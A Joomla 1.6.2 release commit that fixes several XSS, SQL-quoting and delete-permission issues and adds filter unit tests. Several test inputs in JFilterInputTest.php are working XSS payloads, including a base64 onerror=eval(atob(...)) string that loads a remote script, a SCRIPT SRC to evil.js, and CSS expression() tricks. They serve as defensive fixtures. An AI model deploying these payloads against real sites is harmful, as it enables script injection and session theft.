joomla/cms
29
0
Fork 0
mirror of https://github.com/joomla/joomla-cms.git synced 2024-06-27 07:33:41 +00:00
Code Packages Releases Activity

Preparing for 1.6.2

Browse Source 
git-svn-id: http://joomlacode.org/svn/joomla/development/trunk@21148 6f6e1ebd-4c2b-0410-823f-f34bde69bce9
This commit is contained in:
Ian MacLennan 2011-04-14 17:30:08 +00:00
parent 5ce00dde60
commit c4c870b5cb
31 changed files with 343 additions and 94 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
administrator/components/com_banners/models/banner.php
View File

@ -34,18 +34,23 @@ class BannersModelBanner extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state changed.
*
* @param object A record object.
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.

19
administrator/components/com_banners/models/client.php
View File

@ -28,13 +28,18 @@ class BannersModelClient extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
}
else {
return $user->authorise('core.delete', 'com_banners');
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
}
else {
return $user->authorise('core.delete', 'com_banners');
}
}
}

11
administrator/components/com_banners/views/banners/view.html.php
View File

@ -88,15 +88,14 @@ class BannersViewBanners extends JView
JToolBarHelper::custom('banners.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
}
if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) {
if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('banners.trash','JTOOLBAR_TRASH');
}
if ( $canDo->get('core.delete')) {
JToolBarHelper::deleteList('', 'banners.delete','JTOOLBAR_EMPTY_TRASH');
JToolBarHelper::divider();
}
else if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('banners.trash','JTOOLBAR_TRASH');
JToolBarHelper::divider();
}
if ($canDo->get('core.admin')) {
JToolBarHelper::preferences('com_banners');
JToolBarHelper::divider();

8
administrator/components/com_banners/views/clients/view.html.php
View File

@ -69,11 +69,11 @@ class BannersViewClients extends JView
JToolBarHelper::archiveList('clients.archive','JTOOLBAR_ARCHIVE');
JToolBarHelper::custom('clients.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
}
if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) {
JToolBarHelper::deleteList('', 'clients.delete','JTOOLBAR_EMPTY_TRASH');
JToolBarHelper::divider();
} else if ($canDo->get('core.edit.state')) {
if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('clients.trash','JTOOLBAR_TRASH');
}
if ( $canDo->get('core.delete')) {
JToolBarHelper::deleteList('', 'clients.delete','JTOOLBAR_EMPTY_TRASH');
JToolBarHelper::divider();
}

12
administrator/components/com_categories/models/category.php
View File

@ -34,10 +34,16 @@ class CategoriesModelCategory extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->id)) {
if ($record->published != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', $record->extension.'.category.'.(int) $record->id);
}
return $user->authorise('core.delete', $record->extension.'.category.'.(int) $record->id);
}
}
/**
* Method to test whether a record can be deleted.

17
administrator/components/com_contact/models/contact.php
View File

@ -30,19 +30,18 @@ class ContactModelContact extends JModelAdmin
* @since 1.6
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if ($record->catid) {
{
if (!empty($record->id)) {
if ($record->published != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_contact.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state edited.
*
* @param object $record A record object.
*

2
administrator/components/com_contact/views/contacts/tmpl/modal.php
View File

@ -87,7 +87,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $this->escape($item->name); ?></a>
</td>
<td align="center">

12
administrator/components/com_content/models/article.php
View File

@ -39,13 +39,17 @@ class ContentModelArticle extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_content.article.'.(int) $record->id);
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_content.article.'.(int) $record->id);
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state edited.
*
* @param object $record A record object.
*

2
administrator/components/com_content/views/articles/tmpl/modal.php
View File

@ -88,7 +88,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
<?php echo $this->escape($item->title); ?></a>
</td>
<td class="center">

9
administrator/components/com_menus/models/item.php
View File

@ -55,13 +55,18 @@ class MenusModelItem extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->id)) {
if ($record->published != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_menus.item.'.(int) $record->id);
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state edited.
*
* @param object A record object.
*

8
administrator/components/com_menus/views/items/view.html.php
View File

@ -185,13 +185,13 @@ class MenusViewItems extends JView
JToolBarHelper::divider();
JToolBarHelper::custom('items.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
}
if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('items.trash','JTOOLBAR_TRASH');
}
if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) {
JToolBarHelper::deleteList('', 'items.delete','JTOOLBAR_EMPTY_TRASH');
}
else if ($canDo->get('core.edit.state')) {
JToolBarHelper::trash('items.trash','JTOOLBAR_TRASH');
}
if ($canDo->get('core.edit.state')) {
JToolBarHelper::makeDefault('items.setDefault', 'COM_MENUS_TOOLBAR_SET_HOME');

7
administrator/components/com_modules/models/module.php
View File

@ -85,8 +85,11 @@ class ModulesModelModule extends JModelAdmin
if ($table->load($pk)) {
// Access checks.
if (!$user->authorise('core.delete', 'com_modules')) {
throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
if (!$user->authorise('core.delete', 'com_modules') ||
$table->published != -2) {
JError::raiseWarning(403, JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
// throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
return;
}
if (!$table->delete($pk)) {

23
administrator/components/com_newsfeeds/models/newsfeed.php
View File

@ -34,18 +34,23 @@ class NewsfeedsModelNewsfeed extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
if (!empty($record->id)) {
if ($record->published != -2) {
return ;
}
$user = JFactory::getUser();
if (!empty($record->catid)) {
return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state changed.
*
* @param object A record object.
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.

2
administrator/components/com_newsfeeds/views/newsfeeds/tmpl/modal.php
View File

@ -85,7 +85,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $this->escape($item->name); ?></a>
</td>
<td class="center">

39
administrator/components/com_redirect/models/link.php
View File

@ -24,6 +24,45 @@ class RedirectModelLink extends JModelAdmin
* @since 1.6
*/
protected $text_prefix = 'COM_REDIRECT';
/**
* Method to test whether a record can be deleted.
*
* @param object $record A record object.
*
* @return boolean True if allowed to delete the record. Defaults to the permission set in the component.
* @since 1.6
*/
protected function canDelete($record)
{
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
return $user->authorise('core.delete', 'com_redirect');
}
}
/**
* Method to test whether a record can have its state edited.
*
* @param object $record A record object.
*
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
* @since 1.6
*/
protected function canEditState($record)
{
$user = JFactory::getUser();
// Check the component since there are no categories or other assets.
if (!empty($record->id)) {
return parent::canEditState($record);
}
}
/**
* Returns a reference to the a Table object, always creating it.
*

6
administrator/components/com_users/views/users/tmpl/modal.php
View File

@ -23,7 +23,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" size="40" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
<button type="button" onclick="if (window.parent) window.parent.<?php echo $function;?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
<button type="button" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
</div>
<div class="right">
<ol>
@ -64,7 +64,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
foreach ($this->items as $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $item->name; ?></a>
</td>
<td align="center">
@ -79,7 +79,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
</table>
<div>
<input type="hidden" name="task" value="" />
<input type="hidden" name="field" value="<?php echo $field; ?>" />
<input type="hidden" name="field" value="<?php echo $this->escape($field); ?>" />
<input type="hidden" name="boxchecked" value="0" />
<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />

23
administrator/components/com_weblinks/models/weblink.php
View File

@ -34,18 +34,23 @@ class WeblinksModelWeblink extends JModelAdmin
*/
protected function canDelete($record)
{
$user = JFactory::getUser();
if ($record->catid) {
return $user->authorise('core.delete', 'com_weblinks.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
if (!empty($record->id)) {
if ($record->state != -2) {
return ;
}
$user = JFactory::getUser();
if ($record->catid) {
return $user->authorise('core.delete', 'com_weblinks.category.'.(int) $record->catid);
}
else {
return parent::canDelete($record);
}
}
}
/**
* Method to test whether a record can be deleted.
* Method to test whether a record can have its state changed.
*
* @param object A record object.
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.

2
administrator/includes/framework.php
View File

@ -20,7 +20,7 @@ defined('_JEXEC') or die;
/*
* Installation check, and check on removal of the install directory.
*/
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) /*|| file_exists(JPATH_INSTALLATION.'/index.php')*/) {
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) || file_exists(JPATH_INSTALLATION.'/index.php')) {
header('Location: ../installation/index.php');
exit();
}

2
administrator/templates/hathor/html/com_contact/contacts/modal.php
View File

@ -90,7 +90,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<th>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $this->escape($item->name); ?></a>
</th>
<td class="center">

2
administrator/templates/hathor/html/com_content/articles/modal.php
View File

@ -86,7 +86,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<th>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
<?php echo $this->escape($item->title); ?></a>
</th>
<td class="center">

2
administrator/templates/hathor/html/com_newsfeeds/newsfeeds/modal.php
View File

@ -87,7 +87,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<?php foreach ($this->items as $i => $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<th>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $this->escape($item->name); ?></a>
</th>
<td class="center">

4
administrator/templates/hathor/html/com_users/users/modal.php
View File

@ -25,7 +25,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
<button type="button" onclick="if (window.parent) window.parent.<?php echo $function;?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
<button type="button" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
</div>
<div class="filter-select">
<label for="filter_group_id">
@ -60,7 +60,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
foreach ($this->items as $item) : ?>
<tr class="row<?php echo $i % 2; ?>">
<td>
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
<?php echo $item->name; ?></a>
</td>
<td class="center">

5
components/com_banners/models/banners.php
View File

@ -85,6 +85,7 @@ class BannersModelBanners extends JModelList
if ($cid) {
$query->where('a.cid = ' . (int) $cid);
$query->join('LEFT', '#__banner_clients AS cl ON cl.id = a.cid');
$query->join('LEFT', '#__categories as cat ON a.catid = cat.id');
$query->select('cl.track_impressions as client_track_impressions');
$query->where('cl.state = 1');
}
@ -138,7 +139,7 @@ class BannersModelBanners extends JModelList
foreach ($keywords as $keyword)
{
$keyword=trim($keyword);
$condition1 = "a.own_prefix=1 AND a.metakey_prefix=SUBSTRING('".$keyword."',1,LENGTH( a.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=1 AND cl.metakey_prefix=SUBSTRING('".$keyword."',1,LENGTH(cl.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=0 AND ".($prefix==substr($keyword,0,strlen($prefix))?'1':'0');
$condition1 = "a.own_prefix=1 AND a.metakey_prefix=SUBSTRING(".$db->quote($keyword).",1,LENGTH( a.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=1 AND cl.metakey_prefix=SUBSTRING(".$db->quote($keyword).",1,LENGTH(cl.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=0 AND ".($prefix==substr($keyword,0,strlen($prefix))?'1':'0');
$condition2="a.metakey REGEXP '[[:<:]]".$db->getEscaped($keyword) . "[[:>:]]'";
@ -270,4 +271,4 @@ class BannersModelBanners extends JModelList
}
}
}
}
}

2
includes/application.php
View File

@ -410,7 +410,7 @@ final class JSite extends JApplication
$menu = $this->getMenu();
$item = $menu->getActive();
if (!$item) {
$item = $menu->getItem(JRequest::getVar('Itemid'));
$item = $menu->getItem(JRequest::getInt('Itemid'));
}
$id = 0;

2
includes/framework.php
View File

@ -21,7 +21,7 @@ defined('_JEXEC') or die;
// Installation check, and check on removal of the install directory.
//
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) /*|| file_exists(JPATH_INSTALLATION.'/index.php')*/) {
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) || file_exists(JPATH_INSTALLATION.'/index.php')) {
if (file_exists(JPATH_INSTALLATION.'/index.php')) {
header('Location: '.substr($_SERVER['REQUEST_URI'],0,strpos($_SERVER['REQUEST_URI'],'index.php')).'installation/index.php');

3
installation/CHANGELOG
View File

@ -27,6 +27,9 @@ $ -> Language fix or change
- -> Removed
! -> Note
-------------------- 1.6.2 Stable Release [14-Apr-2011] ------------------
14-Apr-2011
# [#25617] performance of assets table query with > 40 articles on website in registered mode

52
libraries/joomla/filter/filterinput.php
View File

@ -279,6 +279,15 @@ class JFilterInput extends JObject
$postTag = substr($postTag, $tagOpen_start);
$fromTagOpen = substr($postTag, 1);
$tagOpen_end = strpos($fromTagOpen, '>');
// Check for mal-formed tag where we have a second '<' before the first '>'
$nextOpenTag = (strlen($postTag) > $tagOpen_start) ? strpos($postTag, '<', $tagOpen_start + 1) : false;
if (($nextOpenTag !== false) && ($nextOpenTag < $tagOpen_end)) {
// At this point we have a mal-formed tag -- remove the offending open
$postTag = substr($postTag, 0, $tagOpen_start) . substr($postTag, $tagOpen_start + 1);
$tagOpen_start = strpos($postTag, '<');
continue;
}
// Let's catch any non-terminated tags and skip over them
if ($tagOpen_end === false) {
@ -566,13 +575,19 @@ class JFilterInput extends JObject
$escapedChars = array ('&lt;', '&quot;', '&gt;');
// Process each portion based on presence of =" and "<space>, "/>, or ">
// See if there are any more attributes to process
while (preg_match('#\s*=\s*\"#', $remainder, $matches, PREG_OFFSET_CAPTURE))
while (preg_match('#\s*=\s*(\"|\')#', $remainder, $matches, PREG_OFFSET_CAPTURE))
{
// get the portion before the attribute value
$quotePosition = $matches[0][1];
$nextBefore = $quotePosition + strlen($matches[0][0]);
// Figure out if we have a single or double quote and look for the matching closing quote
// Closing quote should be "/>, ">, "<space>, or " at the end of the string
$quote = substr($matches[0][0], -1);
$pregMatch = ($quote == '"') ? '#(\"\s*/\s*>|\"\s*>|\"\s+|\"$)#' : "#(\'\s*/\s*>|\'\s*>|\'\s+|\'$)#";
// get the portion after attribute value
if (preg_match('#(\"\s*/\s*>|\"\s*>|\"\s+|\"$)#', substr($remainder, $nextBefore), $matches, PREG_OFFSET_CAPTURE)) {
if (preg_match($pregMatch, substr($remainder, $nextBefore), $matches, PREG_OFFSET_CAPTURE)) {
// We have a closing quote
$nextAfter = $nextBefore + $matches[0][1];
} else {
@ -583,11 +598,40 @@ class JFilterInput extends JObject
$attributeValue = substr($remainder, $nextBefore, $nextAfter - $nextBefore);
// Escape bad chars
$attributeValue = str_replace($badChars, $escapedChars, $attributeValue);
$alreadyFiltered .= substr($remainder, 0, $nextBefore) . $attributeValue . '"';
$attributeValue = $this->_stripCSSExpressions($attributeValue);
$alreadyFiltered .= substr($remainder, 0, $nextBefore) . $attributeValue . $quote;
$remainder = substr($remainder, $nextAfter + 1);
}
// At this point, we just have to return the $alreadyFiltered and the $remainder
return $alreadyFiltered . $remainder;
}
}
/**
* Remove CSS Expressions in the form of <property>:expression(...)
*
* @param string $source The source string.
* @return string Filtered string
* @since 1.6
*/
protected function _stripCSSExpressions($source)
{
// Strip any comments out (in the form of /*...*/)
$test = preg_replace('#\/\*.*\*\/#U', '', $source);
// Test for :expression
if (!stripos($test, ':expression')) {
// Not found, so we are done
$return = $source;
}
else {
// At this point, we have stripped out the comments and have found :expression
// Test stripped string for :expression followed by a '('
if (preg_match_all('#:expression\s*\(#', $test, $matches)) {
// If found, remove :expression
$test = str_ireplace(':expression', '', $test);
$return = $test;
}
}
return $return;
}
}

5
libraries/joomla/html/html/behavior.php
View File

@ -660,10 +660,13 @@ abstract class JHtmlBehavior
// Include mootools framework
self::framework();
$js = "window.addEvent('domready', function () {if (top != self) {top.location.replace(".$location.");}});";
$js = "window.addEvent('domready', function () {if (top == self) {document.documentElement.style.display = 'block'; } else {top.location = self.location; }});";
$document = JFactory::getDocument();
$document->addStyleDeclaration('html { display:none }');
$document->addScriptDeclaration($js);
JResponse::setHeader('X-Frames-Options', 'SAME-ORIGIN');
JResponse::setHeader('X-Content-Security-Policy', 'frame-ancestors \'self\'');
$loaded = true;
}

4
libraries/joomla/version.php
View File

@ -24,13 +24,13 @@ class JVersion
/** @public string Development Status */
public $DEV_STATUS = 'Stable';
/** @public int Sub Release Level */
public $DEV_LEVEL = '1';
public $DEV_LEVEL = '2';
/** @public int build Number */
public $BUILD = '';
/** @public string Codename */
public $CODENAME = 'Onward';
/** @public string Date */
public $RELDATE = '07-Mar-2011';
public $RELDATE = '14-Apr-2011';
/** @public string Time */
public $RELTIME = '23:00';
/** @public string Timezone */

2
libraries/phpmailer/language/phpmailer.lang-joomla.php
View File

@ -3,6 +3,8 @@
* PHPMailer language file.
* English Version
*/
// no direct access
defined('_JEXEC') or die;
$PHPMAILER_LANG = array();

129
tests/unit/suite/libraries/joomla/filter/JFilterInputTest.php
View File

@ -311,6 +311,30 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'123.567',
'From generic cases'
),
'string_single_quote' => array(
'string',
"this is a 'test' of ?",
"this is a 'test' of ?",
'From generic cases'
),
'string_double_quote' => array(
'string',
'this is a "test" of "double" quotes',
'this is a "test" of "double" quotes',
'From generic cases'
),
'string_odd_double_quote' => array(
'string',
'this is a "test of "odd number" of quotes',
'this is a "test of "odd number" of quotes',
'From generic cases'
),
'string_odd_mixed_quote' => array(
'string',
'this is a "test\' of "odd number" of quotes',
'this is a "test\' of "odd number" of quotes',
'From generic cases'
),
'unknown_01' => array(
'',
'123.567',
@ -356,7 +380,7 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'Malformed Nested tags' => array(
'',
'<em><strongFred</strong></em>',
'<em><strongFred</strong></em>',
'<em>strongFred</strong></em>',
'From generic cases'
),
'Unquoted Attribute Without Space' => array(
@ -413,6 +437,12 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'<img class="one two" />',
'Test for recursion with single tags - From generic cases'
),
'missing_quote' => array(
'string',
'<img height="123 />',
'img height="123 /&gt;"',
'From generic cases'
),
);
}
@ -662,7 +692,37 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'<img class="one two" />',
'<img />',
'From specific cases'
)
),
'security_20110329a' => array(
'string',
"<img src='<img src='///'/> ",
'<img /> ',
'From specific cases'
),
'security_20110329b' => array(
'string',
"<img src='<img src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
'<img /> ',
'From specific cases'
),
'hanging_quote' => array(
'string',
"<img src=\' />",
'<img />',
'From specific cases'
),
'hanging_quote2' => array(
'string',
'<img src slkdjls " this is "more " stuff',
'img src slkdjls " this is "more " stuff',
'From specific cases'
),
'hanging_quote3' => array(
'string',
"<img src=\"\'\" />",
'<img />',
'From specific cases'
),
);
$tests = array_merge($this->casesGeneric(), $casesSpecific);
@ -954,7 +1014,7 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'security_tracker_24802_e' => array(
'',
'<img src=<img src=x"/onerror=alert(1)//">',
'<img src=<img src="x/onerror=alert(1)//" />',
'img src=<img src="x/onerror=alert(1)//" />',
'From specific cases'
),
'empty_alt' => array(
@ -1023,6 +1083,60 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'<p class="my_class">This is a <a href="http://mysite.com" img="my_image">link test</a>. This is <span class="myclass" font="myfont"> some more</span> text.</p>',
'Test valid nested tag'
),
'hanging_quote' => array(
'string',
"<img src=\' />",
'<img src="" />',
'From specific cases'
),
'hanging_quote2' => array(
'string',
'<img src slkdjls " this is "more " stuff',
'img src slkdjls " this is "more " stuff',
'From specific cases'
),
'hanging_quote3' => array(
'string',
"<img src=\"\' />",
'img src="\\\' /&gt;"',
'From specific cases'
),
'tracker25558a' => array(
'string',
'<SCRIPT SRC=http://jeffchannell.com/evil.js#<B />',
'SCRIPT SRC=http://jeffchannell.com/evil.js#<B />',
'Test mal-formed element from 25558a'
),
'tracker25558b' => array(
'string',
'<IMG STYLE="xss:expression(alert(\'XSS\'))" />',
'<IMG STYLE="xss(alert(\'XSS\'))" />',
'Test mal-formed element from 25558b'
),
'tracker25558c' => array(
'string',
'<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))" />',
'<IMG STYLE="xss(alert(\'XSS\'))" />',
'Test mal-formed element from 25558b'
),
'tracker25558d' => array(
'string',
'<IMG STYLE="xss:expr/*XSS*/ess/*another comment*/ion(alert(\'XSS\'))" />',
'<IMG STYLE="xss(alert(\'XSS\'))" />',
'Test mal-formed element from 25558b'
),
'tracker25558e' => array(
'string',
'<b><script<b></b><alert(1)</script </b>',
'<b>script<b></b>alert(1)/script</b>',
'Test mal-formed element from 25558e'
),
'security_20110329a' => array(
'string',
"<img src='<img src='///'/> ",
"<img src=\"'&lt;img\" src=\"'///'/\" /> ",
'From specific cases'
),
);
$tests = array_merge($this->casesGeneric(), $casesSpecific);
@ -1112,7 +1226,14 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'<img class="one two" />',
'',
'From specific cases'
)
),
'security_20110328' => array(
'string',
"<img src='<img
src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
' ',
'From specific cases'
),
);
$tests = array_merge($this->casesGeneric(), $casesSpecific);